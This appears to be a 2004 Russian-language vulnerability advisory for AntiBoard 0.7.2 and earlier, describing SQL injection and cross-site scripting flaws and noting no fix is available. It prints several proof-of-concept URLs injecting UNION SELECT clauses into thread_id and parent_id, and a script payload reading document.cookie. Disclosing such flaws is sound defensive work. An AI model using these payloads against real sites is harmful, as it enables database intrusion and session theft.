SQL инъекция и межсайтовый скриптинг в AntiBoard
| Дата публикации: | 01.08.2004 |
| Всего просмотров: | 1119 |
| Опасность: | Средняя |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: AntiBoard 0.7.2 и более ранние версии
Описание: Уязвимости в AntiBoard позволяют удаленному пользователю внедрить SQL команды и выполнить XSS нападение. 1. SQL инъекция: /antiboard.php?thread_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=threaded&sort_order= /antiboard.php?range=all&mode=thr eaded&thread_id=1&reply=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever-- /antiboard.php?range=all&thread_id=1%20UNION%20ALL%20select%20field%20from%20w hatever--&sort_order=ASC&mode=threaded /antiboard.php?thread_id=1&parent_id=1%20UNION%20ALL%20select%20field%20from%20whatever--&mode=nested&reply=12. XSS: http://[target]/antiboard.php?thread_id=1&mode=threaded&range=&feedback=<script>alert(docu ment.cookie);</script> URL производителя: http://www.resynthesize.com/code/antiboard_info.php Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | AntiBoard <= 0.7.2 XSS/SQL Injection |